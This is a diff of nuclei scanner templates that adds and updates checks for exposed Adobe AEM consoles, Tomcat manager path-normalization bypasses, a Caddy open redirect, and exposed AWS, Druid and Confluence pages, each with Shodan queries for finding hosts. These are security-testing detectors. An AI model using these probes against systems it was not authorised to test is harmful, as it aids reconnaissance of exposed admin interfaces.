--- /dev/null
+++ b/misconfiguration/aem/aem-crx-browser.yaml
@@ -0,0 +1,33 @@
+id: aem-crx-browser
+
+info:
+  name: Adobe AEM CRX Browser Exposure
+  author: dhiyaneshDk
+  severity: unknown
+  reference:
+    - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt
+  metadata:
+    shodan-query:
+      - http.title:"AEM Sign In"
+      - http.component:"Adobe Experience Manager"
+  tags: misconfig,aem,adobe,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/crx/explorer/browser/index.jsp"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>Content Explorer - UserID: anonymous | Workspace: crx.default</title>'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/aem/aem-crx-bypass.yaml b/misconfiguration/aem/aem-crx-bypass.yaml
index cdb6438ebc..08c0f814dc 100644
--- a/misconfiguration/aem/aem-crx-bypass.yaml
+++ b/misconfiguration/aem/aem-crx-bypass.yaml
@@ -8,6 +8,8 @@ info:
   remediation: "Adobe recommends AEM customers review access controls for the CRX package manager path: /etc/packages."
   reference:
     - https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/
+  metadata:
+    shodan-query: http.component:"Adobe Experience Manager"
   tags: aem,adobe
 
 requests:
diff --git a/misconfiguration/aem/aem-crx-namespace.yaml b/misconfiguration/aem/aem-crx-namespace.yaml
new file mode 100644
index 0000000000..d51e4428e1
--- /dev/null
+++ b/misconfiguration/aem/aem-crx-namespace.yaml
@@ -0,0 +1,35 @@
+id: aem-crx-namespace
+
+info:
+  name: Adobe AEM CRX Namespace Editor Exposure
+  author: dhiyaneshDk
+  severity: low
+  reference:
+    - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt
+  metadata:
+    shodan-query:
+      - http.title:"AEM Sign In"
+      - http.component:"Adobe Experience Manager"
+  tags: exposure,aem,adobe
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/crx/explorer/ui/namespace_editor.jsp"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>Namespaces</title>'
+          - 'The following namespaces are registered in the repository:'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/aem/aem-crx-search.yaml b/misconfiguration/aem/aem-crx-search.yaml
new file mode 100644
index 0000000000..9f4b69c64c
--- /dev/null
+++ b/misconfiguration/aem/aem-crx-search.yaml
@@ -0,0 +1,38 @@
+id: aem-crx-search
+
+info:
+  name: Adobe AEM CRX Search Exposed
+  author: dhiyaneshDk
+  severity: unknown
+  reference:
+    - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt
+  metadata:
+    shodan-query:
+      - http.title:"AEM Sign In"
+      - http.component:"Adobe Experience Manager"
+  tags: misconfig,aem,adobe,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/crx/explorer/ui/search.jsp"
+      - "{{BaseURL}}/crx/explorer/ui/search.jsp?Path=&amp;Query="
+      - "{{BaseURL}}/crx/explorer/ui/search.jsp?Path=&Query="
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>Search</title>'
+          - '"/crx/explorer/ui/";'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/aem/aem-debugging-libraries.yaml b/misconfiguration/aem/aem-debugging-libraries.yaml
new file mode 100644
index 0000000000..75df6518a5
--- /dev/null
+++ b/misconfiguration/aem/aem-debugging-libraries.yaml
@@ -0,0 +1,34 @@
+id: aem-debugging-libraries
+
+info:
+  name: Adobe AEM Debugging Client Libraries
+  author: dhiyaneshDk
+  severity: info
+  reference:
+    - https://aem4beginner.blogspot.com/debugging-client-libraries
+    - https://adobe-consulting-services.github.io/acs-aem-tools/features/dumplibs/index.html
+  metadata:
+    verified: true
+    shodan-query:
+      - http.title:"AEM Sign In"
+      - http.component:"Adobe Experience Manager"
+  tags: misconfig,aem,adobe
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/libs/cq/ui/content/dumplibs.html"
+      - "{{BaseURL}}/libs/granite/ui/content/dumplibs.validate.html"
+      - "{{BaseURL}}/libs/granite/ui/content/dumplibs.rebuild.html"
+      - "{{BaseURL}}/libs/granite/ui/content/dumplibs.test.html"
+      - "{{BaseURL}}/libs/granite/ui/content/dumplibs.html"
+
+    stop-at-first-match: true
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>Client Libraries</title>'
+          - '<title>Rebuild Client Libraries</title>'
+          - '<title>Client Libraries Test Output</title>'
+        condition: or
diff --git a/misconfiguration/aem/aem-default-get-servlet.yaml b/misconfiguration/aem/aem-default-get-servlet.yaml
index 274b345439..4406d65e1c 100644
--- a/misconfiguration/aem/aem-default-get-servlet.yaml
+++ b/misconfiguration/aem/aem-default-get-servlet.yaml
@@ -8,6 +8,8 @@ info:
   reference:
     - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=43
     - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/dispatcher/GetServletExposed.java
+  metadata:
+    shodan-query: http.component:"Adobe Experience Manager"
   tags: aem,adobe
 
 requests:
diff --git a/misconfiguration/aem/aem-disk-usage.yaml b/misconfiguration/aem/aem-disk-usage.yaml
new file mode 100644
index 0000000000..86d352035d
--- /dev/null
+++ b/misconfiguration/aem/aem-disk-usage.yaml
@@ -0,0 +1,37 @@
+id: aem-disk-usage
+
+info:
+  name: Adobe AEM Disk Usage Information Disclosure
+  author: dhiyaneshDk
+  severity: low
+  reference:
+    - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt
+  metadata:
+    shodan-query:
+      - http.title:"AEM Sign In"
+      - http.component:"Adobe Experience Manager"
+  tags: misconfig,aem,adobe,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/etc/reports/diskusage.html"
+      - "{{BaseURL}}/etc/reports/diskusage.html?path=/content/dam"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'Disk Usage /'
+          - '<th>nodes</th>'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/aem/aem-explorer-nodetypes.yaml b/misconfiguration/aem/aem-explorer-nodetypes.yaml
new file mode 100644
index 0000000000..40df30bb7b
--- /dev/null
+++ b/misconfiguration/aem/aem-explorer-nodetypes.yaml
@@ -0,0 +1,35 @@
+id: aem-explorer-nodetypes
+
+info:
+  name: Adobe AEM Explorer NodeTypes Exposure
+  author: dhiyaneshDk
+  severity: high
+  reference:
+    - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt
+  metadata:
+    shodan-query:
+      - http.title:"AEM Sign In"
+      - http.component:"Adobe Experience Manager"
+  tags: misconfig,aem,adobe,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/crx/explorer/nodetypes/index.jsp"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'nodetypeadmin'
+          - 'Registered Node Types'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/aem/aem-external-link-checker.yaml b/misconfiguration/aem/aem-external-link-checker.yaml
new file mode 100644
index 0000000000..5109fa6426
--- /dev/null
+++ b/misconfiguration/aem/aem-external-link-checker.yaml
@@ -0,0 +1,35 @@
+id: aem-external-link-checker
+
+info:
+  name: Adobe AEM External Link Checker Exposure
+  author: dhiyaneshDk
+  severity: unknown
+  reference:
+    - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt
+  metadata:
+    shodan-query:
+      - http.title:"AEM Sign In"
+      - http.component:"Adobe Experience Manager"
+  tags: misconfig,aem,adobe,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/etc/linkchecker.html"
+      - "{{BaseURL}}/var/linkchecker.html"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>External Link Checker</title>'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/aem/aem-gql-servlet.yaml b/misconfiguration/aem/aem-gql-servlet.yaml
index 977dc70f75..6896f52aa4 100644
--- a/misconfiguration/aem/aem-gql-servlet.yaml
+++ b/misconfiguration/aem/aem-gql-servlet.yaml
@@ -6,6 +6,8 @@ info:
   severity: low
   reference:
     - https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/reference-materials/javadoc/index.html?org/apache/jackrabbit/commons/query/GQL.html
+  metadata:
+    shodan-query: http.component:"Adobe Experience Manager"
   tags: aem
 
 requests:
diff --git a/misconfiguration/aem/aem-groovyconsole.yaml b/misconfiguration/aem/aem-groovyconsole.yaml
index 2d05325869..4251ab58f4 100644
--- a/misconfiguration/aem/aem-groovyconsole.yaml
+++ b/misconfiguration/aem/aem-groovyconsole.yaml
@@ -8,7 +8,9 @@ info:
   reference:
     - https://hackerone.com/reports/672243
     - https://twitter.com/XHackerx007/status/1435139576314671105
-  tags: aem,adobe
+  metadata:
+    shodan-query: http.component:"Adobe Experience Manager"
+  tags: aem,adobe,hackerone
 
 requests:
   - method: GET
diff --git a/misconfiguration/aem/aem-hash-querybuilder.yaml b/misconfiguration/aem/aem-hash-querybuilder.yaml
index cd202b5e1c..e675ccba50 100644
--- a/misconfiguration/aem/aem-hash-querybuilder.yaml
+++ b/misconfiguration/aem/aem-hash-querybuilder.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   reference:
     - https://twitter.com/AEMSecurity/status/1372392101829349376
+  metadata:
+    shodan-query: http.component:"Adobe Experience Manager"
   tags: aem
 
 requests:
diff --git a/misconfiguration/aem/aem-jcr-querybuilder.yaml b/misconfiguration/aem/aem-jcr-querybuilder.yaml
index 15a5d6c4d4..348190cef3 100644
--- a/misconfiguration/aem/aem-jcr-querybuilder.yaml
+++ b/misconfiguration/aem/aem-jcr-querybuilder.yaml
@@ -4,6 +4,8 @@ info:
   name: Query JCR role via QueryBuilder Servlet
   author: DhiyaneshDk
   severity: info
+  metadata:
+    shodan-query: http.component:"Adobe Experience Manager"
   tags: aem
 
 requests:
diff --git a/misconfiguration/aem/aem-login-status.yaml b/misconfiguration/aem/aem-login-status.yaml
index 7a9051e7ef..5ce490bb71 100644
--- a/misconfiguration/aem/aem-login-status.yaml
+++ b/misconfiguration/aem/aem-login-status.yaml
@@ -8,6 +8,8 @@ info:
   reference:
     - https://www.slideshare.net/0ang3el/hunting-for-security-bugs-in-aem-webapps-129262212
     - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/dispatcher/LoginStatusServletExposed.java
+  metadata:
+    shodan-query: http.component:"Adobe Experience Manager"
   tags: aem,adobe
 
 requests:
diff --git a/misconfiguration/aem/aem-merge-metadata-servlet.yaml b/misconfiguration/aem/aem-merge-metadata-servlet.yaml
index 94bdc1a137..bf79d26225 100644
--- a/misconfiguration/aem/aem-merge-metadata-servlet.yaml
+++ b/misconfiguration/aem/aem-merge-metadata-servlet.yaml
@@ -6,6 +6,8 @@ info:
   severity: info
   reference:
     - https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91
+  metadata:
+    shodan-query: http.component:"Adobe Experience Manager"
   tags: aem
 
 requests:
diff --git a/misconfiguration/aem/aem-misc-admin.yaml b/misconfiguration/aem/aem-misc-admin.yaml
new file mode 100644
index 0000000000..79f9cc5e30
--- /dev/null
+++ b/misconfiguration/aem/aem-misc-admin.yaml
@@ -0,0 +1,46 @@
+id: aem-misc-admin
+
+info:
+  name: Adobe AEM Misc Admin Dashboard Exposure
+  author: dhiyaneshDk
+  severity: high
+  reference:
+    - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt
+  metadata:
+    verified: true
+    shodan-query:
+      - http.title:"AEM Sign In"
+      - http.component:"Adobe Experience Manager"
+  tags: misconfig,aem,adobe,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/miscadmin"
+      - "{{BaseURL}}/mcmadmin#/content/dashboard"
+      - "{{BaseURL}}/miscadmin#/etc/mobile"
+      - "{{BaseURL}}/miscadmin#/etc/segmentation"
+      - "{{BaseURL}}/miscadmin#/etc/blueprints"
+      - "{{BaseURL}}/miscadmin#/etc/designs"
+      - "{{BaseURL}}/miscadmin#/etc/importers"
+      - "{{BaseURL}}/miscadmin#/etc/reports"
+      - "{{BaseURL}}/miscadmin#/etc/msm/rolloutconfigs"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>AEM Tools</title>'
+          - '<title>AEM MCM</title>'
+        condition: or
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/aem/aem-offloading-browser.yaml b/misconfiguration/aem/aem-offloading-browser.yaml
new file mode 100644
index 0000000000..7d1324fc27
--- /dev/null
+++ b/misconfiguration/aem/aem-offloading-browser.yaml
@@ -0,0 +1,35 @@
+id: aem-offloading-browser
+
+info:
+  name: Adobe AEM Offloading Browser
+  author: dhiyaneshDk
+  severity: medium
+  reference:
+    - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt
+  metadata:
+    shodan-query:
+      - http.title:"AEM Sign In"
+      - http.component:"Adobe Experience Manager"
+  tags: misconfig,aem,adobe
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/libs/granite/offloading/content/view.html"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'Offloading Browser'
+          - '>CLUSTER</th>'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/aem/aem-osgi-bundles.yaml b/misconfiguration/aem/aem-osgi-bundles.yaml
new file mode 100644
index 0000000000..a8171ba858
--- /dev/null
+++ b/misconfiguration/aem/aem-osgi-bundles.yaml
@@ -0,0 +1,30 @@
+id: aem-osgi-bundles
+
+info:
+  name: Adobe AEM Installed OSGI Bundles
+  author: dhiyaneshDk
+  severity: low
+  reference:
+    - https://www.slideshare.net/0ang3el/hacking-aem-sites
+  metadata:
+    shodan-query:
+      - http.title:"AEM Sign In"
+      - http.component:"Adobe Experience Manager"
+  tags: misconfig,aem,adobe
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/bin.tidy.infinity.json"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '"jcr:primaryType":'
+          - '"jcr:uuid":'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/aem/aem-querybuilder-feed-servlet.yaml b/misconfiguration/aem/aem-querybuilder-feed-servlet.yaml
index b180cc6888..f16f590c36 100644
--- a/misconfiguration/aem/aem-querybuilder-feed-servlet.yaml
+++ b/misconfiguration/aem/aem-querybuilder-feed-servlet.yaml
@@ -6,6 +6,8 @@ info:
   severity: info
   reference:
     - https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html
+  metadata:
+    shodan-query: http.component:"Adobe Experience Manager"
   tags: aem
 
 requests:
diff --git a/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml b/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml
index 5d765ed219..df31561ed0 100644
--- a/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml
+++ b/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   reference:
     - https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91
+  metadata:
+    shodan-query: http.component:"Adobe Experience Manager"
   tags: aem
 
 requests:
diff --git a/misconfiguration/aem/aem-querybuilder-json-servlet.yaml b/misconfiguration/aem/aem-querybuilder-json-servlet.yaml
index 25de00970e..6ceb556bed 100644
--- a/misconfiguration/aem/aem-querybuilder-json-servlet.yaml
+++ b/misconfiguration/aem/aem-querybuilder-json-servlet.yaml
@@ -8,6 +8,8 @@ info:
   reference:
     - https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html
     - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/dispatcher/QueryBuilderExposed.java
+  metadata:
+    shodan-query: http.component:"Adobe Experience Manager"
   tags: aem,adobe
 
 requests:
diff --git a/misconfiguration/aem/aem-security-users.yaml b/misconfiguration/aem/aem-security-users.yaml
new file mode 100644
index 0000000000..4775dcf33b
--- /dev/null
+++ b/misconfiguration/aem/aem-security-users.yaml
@@ -0,0 +1,35 @@
+id: aem-security-users
+
+info:
+  name: Adobe AEM Security Users Exposure
+  author: dhiyaneshDk
+  severity: medium
+  reference:
+    - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt
+  metadata:
+    shodan-query:
+      - http.title:"AEM Sign In"
+      - http.component:"Adobe Experience Manager"
+  tags: misconfig,aem,adobe,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/libs/granite/security/content/useradmin.html"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'AEM Security | Users'
+          - 'trackingelement="create user"'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/aem/aem-setpreferences-xss.yaml b/misconfiguration/aem/aem-setpreferences-xss.yaml
index 87462f5774..98e992d853 100644
--- a/misconfiguration/aem/aem-setpreferences-xss.yaml
+++ b/misconfiguration/aem/aem-setpreferences-xss.yaml
@@ -8,6 +8,8 @@ info:
     - https://www.youtube.com/watch?v=VwLSUHNhrOw&t=142s
     - https://github.com/projectdiscovery/nuclei-templates/issues/3225
     - https://twitter.com/zin_min_phyo/status/1465394815042916352
+  metadata:
+    shodan-query: http.component:"Adobe Experience Manager"
   tags: aem,xss
 
 requests:
diff --git a/misconfiguration/aem/aem-sling-userinfo.yaml b/misconfiguration/aem/aem-sling-userinfo.yaml
new file mode 100644
index 0000000000..c119b072c8
--- /dev/null
+++ b/misconfiguration/aem/aem-sling-userinfo.yaml
@@ -0,0 +1,35 @@
+id: aem-sling-userinfo
+
+info:
+  name: Adobe AEM Sling User Info Servlet Exposure
+  author: DhiyaneshDk
+  severity: info
+  reference:
+    - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt
+  metadata:
+    shodan-query:
+      - http.title:"AEM Sign In"
+      - http.component:"Adobe Experience Manager"
+  tags: misconfig,aem,adobe,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/system/sling/info.sessionInfo.json"
+      - "{{BaseURL}}/system/sling/info.sessionInfo.txt"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'userID:'
+
+      - type: word
+        part: header
+        words:
+          - "text/plain"
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/aem/aem-userinfo-servlet.yaml b/misconfiguration/aem/aem-userinfo-servlet.yaml
index a18d740fa1..b9da88e6a7 100644
--- a/misconfiguration/aem/aem-userinfo-servlet.yaml
+++ b/misconfiguration/aem/aem-userinfo-servlet.yaml
@@ -5,6 +5,8 @@ info:
   author: DhiyaneshDk
   severity: info
   description: "Adobe Experience Manager UserInfoServlet is exposed which allows an attacker to bruteforce credentials. You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node."
+  metadata:
+    shodan-query: http.component:"Adobe Experience Manager"
   tags: aem,bruteforce
 
 requests:
diff --git a/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml b/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml
index 00145f1123..62e10eff70 100644
--- a/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml
+++ b/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml
@@ -6,6 +6,8 @@ info:
   severity: low
   reference:
     - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=96
+  metadata:
+    shodan-query: http.component:"Adobe Experience Manager"
   tags: aem
 
 requests:
diff --git a/misconfiguration/android-debug-database-exposed.yaml b/misconfiguration/android-debug-database-exposed.yaml
index 94bf98c494..86b7f9cb9e 100644
--- a/misconfiguration/android-debug-database-exposed.yaml
+++ b/misconfiguration/android-debug-database-exposed.yaml
@@ -4,8 +4,8 @@ info:
   name: Android Debug Manager
   author: dhiyaneshDK
   severity: low
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Android+Debug+Database%22
+  metadata:
+    shodan-query: http.title:"Android Debug Database"
   tags: unauth,android
 
 requests:
diff --git a/misconfiguration/apache-druid-unauth.yaml b/misconfiguration/apache-druid-unauth.yaml
new file mode 100644
index 0000000000..3f3b004392
--- /dev/null
+++ b/misconfiguration/apache-druid-unauth.yaml
@@ -0,0 +1,26 @@
+id: apache-druid-unauth
+
+info:
+  name: Apache Druid Unauth
+  author: DhiyaneshDk
+  severity: low
+  metadata:
+    verified: true
+    shodan-query: title:"Apache Druid"
+  tags: misconfig,druid,unauth,apache
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/unified-console.html'
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - '<title>Apache Druid</title>'
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/apache/apache-filename-enum.yaml b/misconfiguration/apache/apache-filename-enum.yaml
index 5a6f43d2f1..6602d54e6d 100644
--- a/misconfiguration/apache/apache-filename-enum.yaml
+++ b/misconfiguration/apache/apache-filename-enum.yaml
@@ -8,7 +8,7 @@ info:
   reference:
     - https://hackerone.com/reports/210238
     - https://www.acunetix.com/vulnerabilities/web/apache-mod_negotiation-filename-bruteforcing/
-  tags: apache,misconfig
+  tags: apache,misconfig,hackerone
 
 requests:
   - method: GET
diff --git a/misconfiguration/apache/apache-tomcat-snoop.yaml b/misconfiguration/apache/apache-tomcat-snoop.yaml
index 9cb1ec5328..d341f28db6 100644
--- a/misconfiguration/apache/apache-tomcat-snoop.yaml
+++ b/misconfiguration/apache/apache-tomcat-snoop.yaml
@@ -7,6 +7,8 @@ info:
   description: The following example scripts that come with Apache Tomcat v4.x - v7.x and can be used by attackers to gain information about the system. These scripts are also known to be vulnerable to cross site scripting (XSS) injection.
   reference:
     - https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks
+  metadata:
+    shodan-query: title:"Apache Tomcat"
   tags: apache,misconfig,tomcat,disclosure
 
 requests:
diff --git a/exposed-panels/apache/tomcat-pathnormalization.yaml b/misconfiguration/apache/tomcat-pathnormalization.yaml
similarity index 66%
rename from exposed-panels/apache/tomcat-pathnormalization.yaml
rename to misconfiguration/apache/tomcat-pathnormalization.yaml
index 649547cfeb..d0aa0aa4c8 100644
--- a/exposed-panels/apache/tomcat-pathnormalization.yaml
+++ b/misconfiguration/apache/tomcat-pathnormalization.yaml
@@ -2,13 +2,10 @@ id: tomcat-manager-pathnormalization
 
 info:
   name: Tomcat Manager Path Normalization
-  author: organiccrap
+  author: brenocss,organiccrap
   severity: info
-  description: A Tomcat Manager login panel was discovered via path normalization. Normalizing a path involves modifying the string that identifies a path or file so that it conforms to a valid path on the target
-    operating system.
-  reference:
-    - https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/mitigation-path-normalization
-    - https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
+  description: A Tomcat Manager login panel was discovered via path normalization. Normalizing a path involves modifying the string that identifies a path or file so that it conforms to a valid path on the target operating system.
+  reference: https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
   classification:
     cwe-id: CWE-200
   tags: panel,tomcat,apache
@@ -18,6 +15,8 @@ requests:
     path:
       - '{{BaseURL}}/..;/manager/html'
       - '{{BaseURL}}/..;/host-manager/html'
+      - '{{BaseURL}}/{{randstr}}/..;/manager/html'
+      - '{{BaseURL}}/{{randstr}}/..;/host-manager/html'
 
     matchers-condition: and
     matchers:
@@ -31,6 +30,3 @@ requests:
         negative: true
         status:
           - 403
-          - 401
-
-# Enhanced by mp on 2022/03/17
diff --git a/misconfiguration/aws-s3-explorer.yaml b/misconfiguration/aws-s3-explorer.yaml
new file mode 100644
index 0000000000..0f14918cbb
--- /dev/null
+++ b/misconfiguration/aws-s3-explorer.yaml
@@ -0,0 +1,32 @@
+id: aws-s3-explorer
+
+info:
+  name: AWS S3 Explorer
+  author: DhiyaneshDk
+  severity: low
+  reference:
+    - https://www.exploit-db.com/ghdb/7967
+  metadata:
+    verified: true
+    google-query: inurl:s3.amazonaws.com intitle:"AWS S3 Explorer"
+  tags: s3,edb,misconfig,aws,amazon
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.html"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>AWS S3 Explorer</title>'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/aws-xray-application.yaml b/misconfiguration/aws-xray-application.yaml
new file mode 100644
index 0000000000..2ad692af12
--- /dev/null
+++ b/misconfiguration/aws-xray-application.yaml
@@ -0,0 +1,34 @@
+id: aws-xray-application
+
+info:
+  name: AWS X-Ray Sample Application
+  author: DhiyaneshDk
+  severity: info
+  description: AWS X-Ray is a service that helps developers analyze and debug distributed applications.
+  reference:
+    - https://www.facebook.com/ExWareLabs/photos/a.361854183878462/5566269380103557/
+  metadata:
+    verified: true
+    shodan-query: title:"AWS X-Ray Sample Application"
+  tags: misconfig,aws,x-ray,amazon
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>AWS X-Ray Sample Application</title>'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/caddy-open-redirect.yaml b/misconfiguration/caddy-open-redirect.yaml
index 4e43996064..40f51f9b7c 100644
--- a/misconfiguration/caddy-open-redirect.yaml
+++ b/misconfiguration/caddy-open-redirect.yaml
@@ -11,10 +11,10 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}//example.com/%2F..'
+      - '{{BaseURL}}//interact.sh/%2F..'
 
     matchers:
       - type: regex
         part: header
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
\ No newline at end of file
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
\ No newline at end of file
diff --git a/misconfiguration/command-api-explorer.yaml b/misconfiguration/command-api-explorer.yaml
new file mode 100644
index 0000000000..e2d3c6a80e
--- /dev/null
+++ b/misconfiguration/command-api-explorer.yaml
@@ -0,0 +1,30 @@
+id: command-api-explorer
+
+info:
+  name: Command API Explorer
+  author: DhiyaneshDK
+  severity: low
+  metadata:
+    verified: true
+    shodan-query: http.html:"Command API Explorer"
+  tags: panel
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/explorer.html"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<title>Command API Explorer</title>"
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/confluence/confluence-oauth-admin.yaml b/misconfiguration/confluence/confluence-oauth-admin.yaml
new file mode 100644
index 0000000000..10653c3900
--- /dev/null
+++ b/misconfiguration/confluence/confluence-oauth-admin.yaml
@@ -0,0 +1,28 @@
+id: confluence-oauth-admin
+
+info:
+  name: Confluence OAuth Administration Endpoint
+  author: DhiyaneshDK
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.component:"Atlassian Confluence"
+  tags: misconfig,jira,confluence,atlassian
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/plugins/servlet/oauth/view-consumer-info"
+      - "{{BaseURL}}/confluence/plugins/servlet/oauth/view-consumer-info"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>OAuth Consumer Information'
+          - 'OAuth Administration'
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/corebos-htaccess.yaml b/misconfiguration/corebos-htaccess.yaml
new file mode 100644
index 0000000000..ed5dd6748b
--- /dev/null
+++ b/misconfiguration/corebos-htaccess.yaml
@@ -0,0 +1,32 @@
+id: corebos-htaccess
+
+info:
+  name: CoreBos - .htaccess File Exposure
+  author: arafatansari
+  severity: info
+  description: |
+    CoreBos was discovered to have .htaccess file exposed to public which includes sensitive information.
+  reference:
+    - https://huntr.dev/bounties/5b0fe6e3-4ca1-44ae-8875-d7e6c065432e/
+  metadata:
+    verified: true
+    shodan-query: http.html:"corebos"
